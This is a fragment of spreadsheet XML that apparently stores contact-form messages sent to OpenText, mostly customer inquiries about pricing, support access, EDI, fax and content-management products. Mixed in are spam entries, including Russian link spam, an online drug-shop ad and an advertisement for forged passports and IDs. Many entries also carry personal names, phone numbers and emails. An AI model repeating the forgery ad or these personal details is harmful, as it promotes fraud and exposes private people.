    <t xml:space="preserve">Bonjour,_x000D_
_x000D_
Je travaille au service Méthodes/ Qualité au centre technique d'Arkema à Pierre Bénite. _x000D_
Nous sommes une ingénierie intégrée et avons plusieurs projets dans différents pays (France, Chine, US...)._x000D_
Nous utilisons actuellement Sharepoint 2010 avec un développement interne pour le doc control (suivi des commentaires, transmittal, RFI...)._x000D_
Nous souhaitons migrer vers Sharepoint Online ou "On premise" avec une surcouche pour gérer la documentation projet._x000D_
En parcourant votre site, j'ai cru comprendre qu'il était possible de connecter votre outil à Sharepoint. _x000D_
Nous travaillons actuellement avec une ingénierie externe qui utilise Documentum et les fonctionnalités utilisées semblent intéressantes._x000D_
Pouvez-vous me dire les restrictions possibles liée à l'utilisation de votre outil et Sharepoint et la durée moyenne d'un déploiement d'une telle solution?_x000D_
_x000D_
Cordialement._x000D_
</t>
  </si>
  <si>
    <t>We currently are running on an older version of Gupta Report Builder (4.0) and would like to get pricing on the latest version. We currently use it in conjunction with Visual Enterprise 7.0 for our report forms and need to make modifications to those forms.</t>
  </si>
  <si>
    <t xml:space="preserve">I need to stop call </t>
  </si>
  <si>
    <t>When I try to launch BIRT, I get the Java Exit Code 13 error</t>
  </si>
  <si>
    <t>Sehr geehrte Damen und Herren,_x000D_
_x000D_
wir sind beauftragt, für ein Unternehmen der metallverarbeitenden Industrie ein ECM-System für 150 Arbeitsplätze zu eruieren, welches sowohl eine hohe Integration in SAP als auch die Anbindung an das ERP Beosys und   KHK ermöglicht._x000D_
Ich würde mich freuen, wenn sich Ihr Vertrieb mit mir in Verbindung setzen würde._x000D_
_x000D_
Mit freundlichen Grüße_x000D_
Kai Hauser_x000D_
M +49 171 4363 986</t>
  </si>
  <si>
    <t>Hello_x000D_
Can you please inform me if i have made a double booking on this course regarding Hans Henrik Jacobsen? If it is the case it is a mistake._x000D_
Best Regards_x000D_
Melina Omercajic</t>
  </si>
  <si>
    <t>I am trying to understand how OpenText Enterprise Connect is licensed, and whether it is part of any other product. We own serveral Open Text products, but do not seem to have purchased Enterprise connect. I want to understand whether it is included in products we have purchased.</t>
  </si>
  <si>
    <t>Bonjour, est-ce que vos formations SAP EXTENDED ECM sont elligibles CPF svp ?_x000D_
merci</t>
  </si>
  <si>
    <t>VPK  Packaging GROUP - formal customer of GXS Belgium._x000D_
Invoice received with unclear informantion about change bank account number._x000D_
Thanks to send us official information about bankaccount and integration of GXS into OPEN TEXT._x000D_
_x000D_
Kind regards,_x000D_
Ann De Vrieze</t>
  </si>
  <si>
    <t>Good Morning._x000D_
We are a small company that operates in IT business. We have a small SAP ECC 6.0 installation that we use only for training. We would like to know if should be possible to integrate it with a Extended ECM for SAP and how could it cost?</t>
  </si>
  <si>
    <t>I would like to terminate our account. Because we have not been using this account for more then a year._x000D_
_x000D_
Thank you in advance.</t>
  </si>
  <si>
    <t>Some document cannot search in Alchemy Administrator</t>
  </si>
  <si>
    <t>not able to use the Live Chat /Learning Central /My Support Access</t>
  </si>
  <si>
    <t>[url=https://russsport.ru/shop/shvedskie-stenki-derevyannye/][img]https://s8.hostingkartinok.com/uploads/images/2017/10/e50473d6c881934967904959db1055a1.jpg[/img][/url] _x000D_
 _x000D_
Достаточно только проявить фантазию и подобрать интересное внешнее исполнение  [url=https://russsport.ru/shop/derevyannye-detskie-gorodki]https://russsport.ru/shop/derevyannye-detskie-gorodki[/url] ну и не без tramp bounce 12. Массажные мячи и коврики.</t>
  </si>
  <si>
    <t>Hello,_x000D_
When can I expect a IRM client for Adobe reader DC 2017.?</t>
  </si>
  <si>
    <t>Does Opentext have a representative in Portugal?</t>
  </si>
  <si>
    <t xml:space="preserve">Hi All,_x000D_
_x000D_
I am interested in this training 5-0161 OpenText Consultant Certification Bootcamp http://www.opentext.com/training/coursedetails.html?id=1265 and I am not sure about the pricing. I read on some Accenture sources that classroom trainings are 30% off to regular prices. Is this also valid for this training? _x000D_
_x000D_
Kind regards,_x000D_
_x000D_
Shahab_x000D_
</t>
  </si>
  <si>
    <t>Request for Service - I am looking for Sr. UX Designer who can work from our office based out of Hyderabad. Duration is 6 months.</t>
  </si>
  <si>
    <t>Good day, I contact you on behalf of our customer Britt Ottem from SINTEF Digital, She's has trouble opening old invoices that previously were on "Streamserve". When I checked it up, I got the URL it refers to does not exist anymore, therefore, the user is notified that shes timed out from proxy. I was wondering if there is a way to open these old invoices?</t>
  </si>
  <si>
    <t>Hi,_x000D_
I'm a BI Architect consultant working for Atos. Recently a client asked me to investigate if Opentext can provide a scale-able Self-Service BI solution using the Studio tool. The client want's to be able to build reports using all 1Tb of operational data of which exist 5 tables containing up to 10^9 rows. Currently thousands of users are using fixed reports querying directly the Operational DB but the DB performance is dropping while business is asking more and complex reports. On your website i found lots of info including the fact that Studio can use both pre-loaded data sources and Big Data Analytics. However I did not found the estimated data load they can handle or how well these components scale. In order for me to directly start from a good basis and use the demo trial of 45 days as efficient as possible. Can you provide me more information or a recommendation on which components to build such Self-Service solution for this client?_x000D_
Kind regards_x000D_
Jordi Tielens</t>
  </si>
  <si>
    <t xml:space="preserve">need pricing for brava reader and various options. i.e._x000D_
1) standalone version _x000D_
2) network license. _x000D_
3) how much would in buy in multiple license. </t>
  </si>
  <si>
    <t>Dear Sir or Madam,_x000D_
Regarding 4-0144 REST API and Content Web Service Fundamentals v16_x000D_
_x000D_
Is this course intended for Documentum content server?_x000D_
and_x000D_
When will this course take place in Germany again?_x000D_
_x000D_
Thanks a lot_x000D_
Stefan</t>
  </si>
  <si>
    <t xml:space="preserve">Мы готовы предложить своим клиентам множество услуг, в число которых входит ремонт квартир под ключ _x000D_
 _x000D_
 _x000D_
[url=https://rem-avangard.ru]ремонт маленькой ванной комнаты под ключ[/url]_x000D_
 _x000D_
&lt;a href=https://rem-avangard.ru&gt;замена водопроводных труб в квартире&lt;/a&gt;_x000D_
</t>
  </si>
  <si>
    <t>Opentext cloud suite and its integration with SAP successfactors</t>
  </si>
  <si>
    <t>Access to MySupport</t>
  </si>
  <si>
    <t>Hi,_x000D_
We have around 500 users and roughly 3000 standard documents that we would like to put into a new EDMS. We are wanting the new EDMS to have offline capability; is this something that Content Server offers? Also, at Ausdrill, we have 9 different subsidiary companies under the Ausdrill umbrella. Currently, we create 1 'Master Document' and our EDMS (SharePoint 2010) automatically creates 9 copies each with the different subsidiary company logo at the top. We are looking to replicate this process in the new EDMS. Is this something that Content Server can do? Or are you able to adapt the program for us? Could you please also give us a rough estimate on how much this will cost? _x000D_
Thanks,_x000D_
Katrina</t>
  </si>
  <si>
    <t>Invalid Prefix for GTIN_x000D_
we are unable to upload items because if this reason. we have a letter from the brand owner. how do we submit this</t>
  </si>
  <si>
    <t xml:space="preserve"> _x000D_
Our company is a unique producer of quality fake documents. We offer only original high-quality fake passports, driver's licenses, ID cards, stamps and other products for a number of countries like: _x000D_
USA, Australia, Belgium, Brazil, Canada, Italy, Finland, France, Germany, Netherlands, Spain, United Kingdom. This list is not full. _x000D_
 _x000D_
To get the additional information and place the order just visit our website: _x000D_
 _x000D_
http://www.salepassportsfake.cc www. salepassportsfake.cc _x000D_
 _x000D_
 _x000D_
&gt;&gt; Contact e-mails: _x000D_
 _x000D_
 _x000D_
General support: support@salepassportsfake.cc _x000D_
 _x000D_
 _x000D_
Technical support: admin@salepassportsfake.cc _x000D_
 _x000D_
 _x000D_
 _x000D_
----------------------------- _x000D_
Keywords: _x000D_
 _x000D_
Get real and original passports USA (United States) _x000D_
Get real and original Australian passports (Australia) _x000D_
Get real and original Belgian passports (Belgium) _x000D_
Get real and original Brazilian passport (Brazil) _x000D_
Get real and original Canadian passports (Canada) _x000D_
Get real and original passports of Finland (Finland) _x000D_
Get real and original French passports (France) _x000D_
Get real and original German passports (Germany) _x000D_
Get real and original Dutch passport (The Netherlands) _x000D_
Get real and original Israeli passports (Israel) _x000D_
Get real and original passports UK (United Kingdom) _x000D_
Get real and original Spanish passport (Spain) _x000D_
Get real and original Mexican passports (Mexico) _x000D_
Get real and original South African passports (South Africa) _x000D_
Get real and original passports Swiss (Switzerland) _x000D_
Get real and original German passports (Germany) _x000D_
Get real and original Chinese passports (China) _x000D_
Get real and original Spanish passport (Spain) _x000D_
Get real and original passports Austrian (Austria) _x000D_
Get real and original Japanese passports (Japan) _x000D_
Get real and original passports of Ukraine (Ukraine) _x000D_
Get real and original passports cambodiens (Cambodia) _x000D_
Get real and original passports UK (United Kingdom) _x000D_
Get real and original passports USA _x000D_
Get real and original passports Romanian (Romania) _x000D_
Get real an</t>
  </si>
  <si>
    <t>Hey Team,_x000D_
_x000D_
I need some assistance with a project that Boeing Employee Credit Union is doing. They are currently implementing service now and they need some licenses categorized as either as (Free Software, N/A, Open Source, Need License Before Install, or Need License After Install)._x000D_
_x000D_
I had a counterpart look into this project and she said that you need their contract ID. I reached out to Jesus Reyes at BECU and he did not have this information. How would i go about getting this number? I can go ahead mention previous orders that they have placed if that would help._x000D_
_x000D_
Looking forward to your response._x000D_
_x000D_
Alex</t>
  </si>
  <si>
    <t>Interested in a partnership.  We are a reseller focused on healthcare.  We would like to recommend and resell RightFax to one of our Healthcare clients.  RightFax Enterprise came as a recommended solution from another one of our clients, Alameda Health System and seems like the right fit for our client.</t>
  </si>
  <si>
    <t>Hi OpenText,_x000D_
_x000D_
I need clarification on a software part to understand what it is. Can someone contact me by email so I may provide additional details?_x000D_
_x000D_
Thank you,_x000D_
_x000D_
Kayleen Kirby</t>
  </si>
  <si>
    <t>Reaching out to Gain Access to TeamSite in order to support a contract with Department of Veterans Affairs</t>
  </si>
  <si>
    <t>Looking to setup demo to view solutions for global HR digital records, global HR case management, and global HR portal.  Thanks! - Cyndi</t>
  </si>
  <si>
    <t>No access at My Support on OpneText Resources._x000D_
I had access before and need to continue a opened support case of my customer about Autonomy Process Automation (HPA - workflow)._x000D_
Regards,_x000D_
Carlos</t>
  </si>
  <si>
    <t>Inquiring about products that can perform inbound fax routing with OCR</t>
  </si>
  <si>
    <t>Looking to make large changes with our current EDI setup.</t>
  </si>
  <si>
    <t>We need a VAN for EDI transfers to a single customer.  Would you please give me a quote on what that would run us each month?  Thanks.</t>
  </si>
  <si>
    <t xml:space="preserve">Unable to download the Supply Chain Analytics For Dummies PDF </t>
  </si>
  <si>
    <t>I would like to be in contact with the account manager for my contract/products to discuss.  I don't have any name and/or contact information available to me.</t>
  </si>
  <si>
    <t>We are facing the technical challenge while printing a translated Spanish text from data base on a notice . We are getting junk characters in place of special characters.</t>
  </si>
  <si>
    <t>We are looking to add a number of users and I would like a quote on adding an additional 40 users to my account.  I am looking for total cost per user.  Is there a onetime set up fee, monthly fee, price for annual vs monthly etc...</t>
  </si>
  <si>
    <t>interest in vfx asset management system</t>
  </si>
  <si>
    <t xml:space="preserve">Can you provide some additional detailed information on your NFS gateway product?_x000D_
- Which windows platforms does it run on?_x000D_
- Which versions of NFS does it support?_x000D_
- How long is the trial period?_x000D_
- What is the pricing for a small number of licenses (1-3)?_x000D_
- Which versions of active directory?_x000D_
- Can it do user mapping (mapping an AD user to an NFS user)?_x000D_
_x000D_
thanks_x000D_
Catherine Button_x000D_
</t>
  </si>
  <si>
    <t xml:space="preserve">Please terminate this account immediately. I will no longer work for McKesson as of Oct. 13, 2017. Also, I have been receiving confidential materials that are not directed to me. _x000D_
acct# 858479, fax 6784590523, account was opened 4/12/16. </t>
  </si>
  <si>
    <t>Hi, I was hoping you could put me in contact with Mica Block or someone at Opentext who might be able to share their expertise for an article I'm writing for TechTarget. I have a few questions about how business content will soon be heavily authored by machine. I'd like to talk to Mica or someone about how content analytics will bridge unstructured content residing on a network and the machine learning that will turn it into usable. Thank you and I look forward to hearing from you as soon as possible. _x000D_
_x000D_
Anna Fiorentino _x000D_
TechTarget Writer_x000D_
afioren1@yahoo.com_x000D_
207-344-4460</t>
  </si>
  <si>
    <t>Discuss Exstream and Output Management to replace an existing tool.</t>
  </si>
  <si>
    <t xml:space="preserve">We currently own 4 - OpenText Desktop Viewer View licenses._x000D_
_x000D_
Please provide us with a quote for 3 additional OpenText Desktop Viewer licenses and maintenance on these licenses that will co-term with our other maintenance (exp = Sep 30, 2018)._x000D_
</t>
  </si>
  <si>
    <t>Estamos avaliando soluções de DAM</t>
  </si>
  <si>
    <t>Alternative solutions for Fax2Mail with a cloud based solution that has the ability to receive faxes on a public telephone number as well.</t>
  </si>
  <si>
    <t>Looking to see a demo for cloud based file management solution</t>
  </si>
  <si>
    <t xml:space="preserve">set up a support account </t>
  </si>
  <si>
    <t xml:space="preserve">Врачи разроботали новое лекарство в лечение гепатита С, подробности на нашем сайте _x000D_
 _x000D_
[url=https://sofosbuvir-express24.ru]купить софосбувир[/url]_x000D_
 _x000D_
&lt;a href=https://sofosbuvir-express24.ru&gt;купить софосбувир&lt;/a&gt;_x000D_
</t>
  </si>
  <si>
    <t>Bonjour_x000D_
je souhaiterai savoir si vous avez une liste d’intégrateurs à Lyon pour réaliser  un projet BPM-GED _x000D_
merci pour votre aide_x000D_
Julien</t>
  </si>
  <si>
    <t>Recommended for your services</t>
  </si>
  <si>
    <t xml:space="preserve">I just purchased a product and have not received email back with download instructions. please assist, thanks_x000D_
_x000D_
Informative Graphics Order IGS-183343 _x000D_
Item# 183343  $59.00 USD  1  $59.00 USD  </t>
  </si>
  <si>
    <t>Pantone had a license agreement in place with HP for Exstream and now that this solution is owned by OpenText we need to enter into a license agreement together in order for the solution to continue to make use of licensed PANTONE® color trademarks and copyrights.</t>
  </si>
  <si>
    <t>I cannot create a case.  I am the main contact for the bank and need to be able to create a case.</t>
  </si>
  <si>
    <t>Good morning,_x000D_
_x000D_
My name is Danny and I'm with the Idaho Transportation Department. I'm reaching out today to inquire about getting a list of resellers that can provide your product, specifically the File360 licenses and support/maintennace. We are currently utilizing this software and it is about time for us to renew the annual licenses. _x000D_
_x000D_
Also it is my understanding that you utilize resellers to sell and support the File360 software could you please confirm that part. _x000D_
_x000D_
Please feel free to reach out if you have any qeustions._x000D_
_x000D_
Thanks,_x000D_
_x000D_
Danny Thanadabouth</t>
  </si>
  <si>
    <t>Looking for Document Management System</t>
  </si>
  <si>
    <t>Current On Premise Installation:  Content Server 10.x  (existing customer)_x000D_
_x000D_
Issue: Nearing a 2 TB data size limitation on our CS10 Admin server (search)._x000D_
_x000D_
Go-Forward:  Looking for assistance from OT Professional Services to assist with formulating/implementing a game plan to re-structure CS10 Admin server file storage to grow  beyond the current 2 TB limitation._x000D_
_x000D_
To paint a picture, the car is racing towards the cliff and we're looking to prevent the car from plummeting to its demise. :-)</t>
  </si>
  <si>
    <t xml:space="preserve">Hello, _x000D_
_x000D_
I work for Fidelity Investments in the Procurement Operations Group. I am looking for a contact at OpenText to participate in an RFI/RFP for future business. _x000D_
_x000D_
Please provide a contact who would work on this process. _x000D_
_x000D_
Thank you!_x000D_
_x000D_
Dani Wildau | Procurement, Category Operations Group_x000D_
Fidelity Investments | Procurement_x000D_
Office: 505-750-5151 | danielle.wildau@fmr.com_x000D_
</t>
  </si>
  <si>
    <t>I used erooms in the past and I understand it made its way into your company. What is the current name of the application, I would like to learn more about it.</t>
  </si>
  <si>
    <t>Looking for a sales contact that can provide my Canon division with Fax server opportunities</t>
  </si>
  <si>
    <t>Please stop sending faxes to (540) 332-5904 and (540) 932-5904.  These lines are not fax machine lines.  Thank you.</t>
  </si>
  <si>
    <t>Where can I find a download of  the latest version of Eterprise Scan?</t>
  </si>
  <si>
    <t>I am trying to active my account for the support portal but it tells me I have not confirmed my account yet.  When I click to re-send the confirmation email it says that it has sent but I never actually get the email.</t>
  </si>
  <si>
    <t xml:space="preserve">Hi,_x000D_
_x000D_
Do you provide WebSphere Technology Solutions?_x000D_
_x000D_
If YES, Then We have 17,312 Ready-to-Buy WebSphere Technology Customers Database from  USA._x000D_
 _x000D_
Test Data will be given to review and check the quality._x000D_
_x000D_
Do you want to see Test data? _x000D_
_x000D_
Thank you_x000D_
_x000D_
Best Regards,_x000D_
Sandra Rivera_x000D_
Sandra.rivera@lead-pool.com_x000D_
_x000D_
</t>
  </si>
  <si>
    <t xml:space="preserve">Dear Cordys Inc.,_x000D_
_x000D_
My name is Bas Keizer and I am an International Commerce student at Saxion University of applied Science (Bachelor) located in Enschede, The Netherlands. _x000D_
_x000D_
In August (2016) I went for the first time to the United States of America. The reason I went there was to do my study abroad assignment. I could have chosen all the countries which were partner-related to my school. I chose back then to go to the States because it has a dream to travel to the country you hear so much of. I wanted to discover how America in real life is instead of the news covers etc. In this semester abroad I had the opportunity to meet new people from around the world during my experience in the American College time. In this period I realized that I was eager for more. _x000D_
_x000D_
The reason why I’m contacted your company is that I was speaking with my contacts at Ferris University. They gave me a list of companies that are looking for interns and graduate students (Thesis-study)._x000D_
_x000D_
I’m eager to apply my knowledge I gained to finish my bachelor with a thesis. By finishing the thesis abroad, would be the most exciting and challenging opportunity to fulfill. _x000D_
_x000D_
For this I came with the idea to finish my study by doing this in the United States. My interest lies in Export, Marketing and sales. I’m certain that I can use my expertise, which I gained over the year, to be of service to Cordys Inc. I’m always looking for a challenge at international and innovative company._x000D_
_x000D_
Feel free to contact me if there should be any questions. I am looking forward to hearing from you and thank you for your time._x000D_
_x000D_
_x000D_
Yours’s sincerely,_x000D_
_x000D_
_x000D_
Bas Keizer_x000D_
bas_keizer@hotmail.com_x000D_
+31 6040230126_x000D_
www.linkedin.com/in/bas-keizer-62749661_x000D_
_x000D_
_x000D_
</t>
  </si>
  <si>
    <t>I'm trying to place an order, but the site won't let me process payment, because Paypal doesn't work.</t>
  </si>
  <si>
    <t>Our board is switching to Open text content server mobile, is there and application available for Office 365 suite, I have an ipad but prefer my laptop.</t>
  </si>
  <si>
    <t>We would like to consider purchasing DocsOpen for our internal document management.</t>
  </si>
  <si>
    <t>I would like to know if there are some sales certifications for ECM / Documentum products and offerings. Thank you in advance. Regards Lasse</t>
  </si>
  <si>
    <t>Hi, Is there any training course based in hong kong?</t>
  </si>
  <si>
    <t>Please Contact for Accounting and Auditing</t>
  </si>
  <si>
    <t xml:space="preserve">We would like to update the bank details that you have for us. I have tried calling and emailing abell@opentext.com on numerous occasions and still had no luck. </t>
  </si>
  <si>
    <t>wanted to understand the pricing and how we can integrate into our own product with data available in our product db (rdbms and HDFS)</t>
  </si>
  <si>
    <t>As I have full access on EMC and now I have lost all the privileges to access products, guides, information, news letters. _x000D_
_x000D_
Kindly provide. Thank you.</t>
  </si>
  <si>
    <t xml:space="preserve">Sir/Madam, I would like to inquire information on Brava CXL. It is stated on the website that the price for individual licence is $145. May I know if that price is one off or there is maintenance fee to be paid annually and how much? Thanks </t>
  </si>
  <si>
    <t xml:space="preserve">Looking for a solution for enterprise content management. </t>
  </si>
  <si>
    <t xml:space="preserve">Bonjour,_x000D_
je n'arrive plus à joindre notre commercial de chez OpenText_x000D_
_x000D_
Je me permets de venir vers vous par rapport à nos lignes fax en gestion chez OpenText._x000D_
_x000D_
Nous devons migrer nos lignes vers un nouveau service,_x000D_
J’ai lancé la demande de portabilité de la ligne ci-dessous de OpentTExt vers Graphnet (nouvel opérateur)_x000D_
Seulement, Opentext a beaucoup de mal à nous répondre ce sur point,_x000D_
Pour le moment, je souhaites une portabilité de la ligne fax ADR Niort : 05 40 16 30 48 _x000D_
POurriez vous me contacter à partir de demain 5/10 pour débloquer ce sujet._x000D_
Cordialement,_x000D_
</t>
  </si>
  <si>
    <t>Re: Website Issues...?_x000D_
_x000D_
Hello,_x000D_
_x000D_
My name is jenny James and I am a Digital Marketing Specialists for a Creative Agency._x000D_
I was doing some industry benchmarking for a client of mine when I came across your website._x000D_
I noticed a few technical errors which correspond with a drop of website traffic over the last 6-8 months which I thought I would bring to your attention._x000D_
After closer inspection it appears your site is lacking in 4 key criteria._x000D_
_x000D_
1- Website Speed_x000D_
2- Link Diversity_x000D_
3- Domain Authority_x000D_
4- Competition Comparison_x000D_
_x000D_
I can send you over the report which shows all of the above and so much more which will help you at least improve your site, its rankings and traffic._x000D_
I would love the chance to help as well however; this report will at least give you a gauge on the quality of what I do.  If you are interested then please share your requirement and contact details_x000D_
_x000D_
Is this the best email to send it to?_x000D_
_x000D_
Regards,_x000D_
Jenny James_x000D_
jennyseomarketing011@gmail.com</t>
  </si>
  <si>
    <t>Привет всем! Класный у вас сайт! _x000D_
Что скажете по поводу этих новостей? _x000D_
http://enewz.ru/news/5751-elektropotreblenie-v-rf-za-nedelyu-snizilos-na-19.html [b] Электропотребление в РФ за неделю снизилось на 1,9% [/b] _x000D_
[url=http://enewz.ru/news/16176--.html] 16176 [/url] _x000D_
http://enewz.ru/politika/22178-ilyumzhinov-raskryl-podrobnosti-svoego-obrascheniya-k-obame.html _x000D_
http://enewz.ru/news/10285-a-v-ukraine-polnaya-zhopa-muzyka-luchshiy-rolik-dnr-za-god-.html _x000D_
Ещё тут много интересного: [b] что творится на донбассе [/b] http://enewz.ru/</t>
  </si>
  <si>
    <t>Request renewal quotation. Please provide PIC contact details in Malaysia.</t>
  </si>
  <si>
    <t>PRICING INFORMATION NEEDED.</t>
  </si>
  <si>
    <t>Hello, I need to try this Cms. So I ask if you can bring me a trial_x000D_
Wait your comments._x000D_
Regards!!!</t>
  </si>
  <si>
    <t>Would like a proposal.</t>
  </si>
  <si>
    <t>Which version of your software uses .NET Framework 4.5.1?  I see that the latest version uses 4.6.  However, our software package (NextGen Fax Manager) uses 4.5.1 at the present.  So, it would present a .NET problem on our fax server.</t>
  </si>
  <si>
    <t xml:space="preserve">can't get to knowledge base need help in changing icon for Nuance in DM </t>
  </si>
  <si>
    <t>I am evaluating your product to make a recommendation</t>
  </si>
  <si>
    <t>My co-workers, Kathleen Smith and JoAnn Dillon are set up with a rightfax number.  I also need a rightfax number please.  Thank you!</t>
  </si>
  <si>
    <t>My name is Daniel Hebert, I work for IBM Corporation from my home office. I am a software engineer and have been with the company for 11 years. I do have a physical disability where I use Dragon NaturallySpeaking to do my work across terminals. However, Dragon NaturallySpeaking does not work with putty or putty like terminals such as Windows command prompts. It needs full-featured Windows with addressable text input boxes._x000D_
_x000D_
I happen to remember seeing an engineer using Hummingbird once upon a time, but I can't remember which one. I see you have a lot of products, and I can't remember which one does SSH and putty-like behaviors. I'm inquiring to see if you have a Hummingbird software that would most apply to my use case, and if there is a trial version so that I can see if it works with Dragon NaturallySpeaking._x000D_
_x000D_
Can that be done?</t>
  </si>
  <si>
    <t>Hello,_x000D_
 _x000D_
Accolade is in the process of standing up a new website as well as some other content, and we’re currently evaluating content management systems. Would it be possible to chat with someone at OpenText about your CMS solution? I would like to walk through some content examples and see how they might be implanted in OpenText._x000D_
 _x000D_
Thank you,_x000D_
Allison</t>
  </si>
  <si>
    <t>We would like to set up VAN services...</t>
  </si>
  <si>
    <t>Hi,_x000D_
It is Urgent._x000D_
I am looking for document generation application which I could add in architecture lanndscape for my potential customer offering. Hence I would like to understand Opentext Document generation capability._x000D_
_x000D_
Thanks_x000D_
Indrajeet</t>
  </si>
  <si>
    <t>for Kaiser Connectivity</t>
  </si>
  <si>
    <t>I do not need an Estimating Software, I need an Estimate Tracking Software. I need a software that can _x000D_
- Track our Estimated individually, _x000D_
- Track the Results, _x000D_
- keep a consensus on the Number of Bidders (Competition), _x000D_
-Track our Customers and which ones we have the greatest success of award with._x000D_
- Track each one of my Individual Estimators performance, Success rate and # of Quotes they did for the year._x000D_
- Advise which estimates or Customers will give us our highest success rates_x000D_
- Keep overall statistics and Forecast what we would need to attain a certain fiscal budget_x000D_
- Keep a percentage Statistic on overall success rate for awarded estimates eg: 10% Success rate or higher_x000D_
So Essentially I would like to Track:_x000D_
- Industry Category (Hospital, Institutional, Office Building and Custom entries), _x000D_
- Type of Tender (Is it an Invite from a Customer?, From a Tendering Website?)_x000D_
- Who it is assigned to to perform the Estimate (What Estimator is performing the Estimate)_x000D_
- Tracking the Time Frame of Each Estimate (Start to finish duration) Start Date - Finish Date and Duration in Days._x000D_
- Provide a Calendar for Closing dates of the Estimate_x000D_
- Track who the Tender is Closing to (Customer)_x000D_
- Track the Tender Closing Type (Hand deliver Tender, E-mailed Tender, Federal or Provincial Tender, did not quote)._x000D_
- Track Bonding requirements for each tender (What type of Bonding, Bid Bond?, Material/Labour Bond?)_x000D_
- Track the Engineer or Consultant for each Tender_x000D_
- Track the Estimate Costs for Each Tender_x000D_
- Keep Track of the Status of the Tender (Pending, Awarded, Cancelled...etc) and while in Pending mode have the Software send Reminders for Follow-up )._x000D_
- Track the Success of our Tenders (1st, 2nd, 3rd, 4th) and Track the Costs of our Competition of the results &amp; advise who is our greatest competition._x000D_
- Track the Low Customer that was awarded the tender_x000D_
- Provide a section for Square foot of the Building for each Tender) - If Applicable_x000D_
- Advise the Tende</t>
  </si>
  <si>
    <t>Need to email you purchase order for renewal OpenText maintenance for Aerojet.</t>
  </si>
  <si>
    <t>This is a test. Can the person or team that maintains this mailbox please contact me via internal channels?_x000D_
Thanks</t>
  </si>
  <si>
    <t>Wondering when you'll know what the training date(s) will be for: Working with BIRT Report Designer.  Looking to send one of our Deputies @ some point next year.  Thank you</t>
  </si>
  <si>
    <t>I log in but I keep going in circles.  I need to open an SR._x000D_
Captiva Capture 7.5 - Am I correct that you do not support Oracle for a database?</t>
  </si>
  <si>
    <t>can't access opentext connect.._x000D_
_x000D_
we have a current contract with opentext and have opened tickets via phone, #3301067 , but can't acces the web portal.</t>
  </si>
  <si>
    <t>I need help to Renew the Manteinance of ApplicationXtender,  is Urgent.  I hope to hear soon from you.  Regards</t>
  </si>
  <si>
    <t>Would like a quote for the Right fax server solution.</t>
  </si>
  <si>
    <t>Larry Blankenship no longer works for Hollins University.</t>
  </si>
  <si>
    <t>Looking for the minimum technical specifications to set up Magellan and pricing for purchase, maintenance &amp; support, professional services per diem.</t>
  </si>
  <si>
    <t>Is there a VPAT available for OpenText Gupta Vision?</t>
  </si>
  <si>
    <t xml:space="preserve">To explore Open Text Document Management solution for HR . </t>
  </si>
  <si>
    <t xml:space="preserve">We need the ability to send Container only ASNs to Chrysler and our current software (Epicor/CMS) does not provide a means to do so. Tried contacting GXS Trade Web; was directed here. Need a solution quickly.  </t>
  </si>
  <si>
    <t>Would like contact information of vendors selling open text in Calgary</t>
  </si>
  <si>
    <t>in our TrustedLink library EDI4XXDTA we are seeing files not getting purged.  we run purges every sunday.  file sizes are large and could be the reason we are having issues with our purge command PRGTC taking over 7 hours to complete.</t>
  </si>
  <si>
    <t>Looking for a New customizable library management system.</t>
  </si>
  <si>
    <t>Single license Open Text exceed 15 or 16. Where can I purchase?</t>
  </si>
  <si>
    <t>Dear gentlemen,_x000D_
We are an IT Service Provideer based in Florida, USA and handle customers in Venezuela as part of our geography of influence._x000D_
We have a customer in the oil industry that needs the following to be used in their corporate offices in Venezuela:_x000D_
P/N EXMPi556700M0000Z-1 Exceed PowerSuite CVL Annual Maintenance - 2 year renewal. _x000D_
Period: Nov 2017-Oct 2019. They need 12 licenses._x000D_
Could please send us your best FOB Miami quote as soon as possible?_x000D_
Thank you very much for your help and cooperation,_x000D_
_x000D_
Rafael Volpe</t>
  </si>
  <si>
    <t>Looking into BPM solutions for client.</t>
  </si>
  <si>
    <t xml:space="preserve">We, Asahi Europe Limited, is in the process of setting up a Finance Shared Service Center, and we are interested to find out more about OpenText as an Accounts Payable application. We are currently running SAP ECC6 and SAP Business One (HANA). _x000D_
</t>
  </si>
  <si>
    <t>Hi _x000D_
_x000D_
We would like to setup a product catalog with open Text , can you please advise the procedure._x000D_
_x000D_
Also , can you please advise if there is a way to find out that if client already have a product catalog setup with Open Text?_x000D_
_x000D_
Thank you_x000D_
_x000D_
Faiza khan</t>
  </si>
  <si>
    <t>I am unable to reset my password. I requested a password reset link, and am receiving an error message when I enter my new password. I need to update administrators on this account. Thank you for any assistance.</t>
  </si>
  <si>
    <t>testing the form</t>
  </si>
  <si>
    <t xml:space="preserve">We would like to set up a data communication between Cold Front Distribution and Mars.  Mars would like to receive an EDI 850 from us.  Am I in the right place?  _x000D_
_x000D_
</t>
  </si>
  <si>
    <t>This is a test of the new shortcode</t>
  </si>
  <si>
    <t>Looking at getting more information for a software called "Live Accredited Server" which tracks Registration, CE credits, outside brokerage accounts and outside business activities for Employees</t>
  </si>
  <si>
    <t>trest</t>
  </si>
  <si>
    <t>I tried to place an order online and paypal wouldn't work.</t>
  </si>
  <si>
    <t>Interested in OCR invoice reconciliation and posting, specifically a quote for budget purposes.</t>
  </si>
  <si>
    <t xml:space="preserve">Query: Gupta Dev tool notes to .net_x000D_
https://www.youtube.com/watch?v=rsp2uBQM8YU_x000D_
_x000D_
I have a query I believe you may be able to assist me with, we have worked in the past i believe with various customers that use your tools along with assistance from Fujitsu to migrate legacy applications domino notes to .net/VS/Web etc. The video above shows the process which is excellent and I would be most interested to know if this would also work to use the PAAS .net azure platform. in other words could i use your tool/solution to go straight from notes/domino to .net but use .net in PAAS instead of do all this locally. Or maybe I can use the tool locally and once completed move to the .net PAAS service. your advise/assistance would be appreciated thanks ian it is likely you are best to ge me on email rather than mobile please_x000D_
</t>
  </si>
  <si>
    <t>Would like to purchase a license of Team Developer v7.</t>
  </si>
  <si>
    <t>Hi_x000D_
_x000D_
It appears my support account and the associated tickets has been deleted. Can they be re-enabled please. This contract has been re-signed as of Friday 29th Sept 2017. Please contact Bob Murphy for more details._x000D_
_x000D_
Thanks_x000D_
_x000D_
Mark</t>
  </si>
  <si>
    <t>We are looking to integration Fax solution with our Electronic Medical Record System to send faxes to patients or other doctors/hospitals etc. Please provide us details and prices of integration solution that you currently have. Thanks</t>
  </si>
  <si>
    <t>The Tempo app is not compatible with IOS11 when will the update be available?</t>
  </si>
  <si>
    <t xml:space="preserve">DRM video content protection </t>
  </si>
  <si>
    <t>Can you give me  details about the following course._x000D_
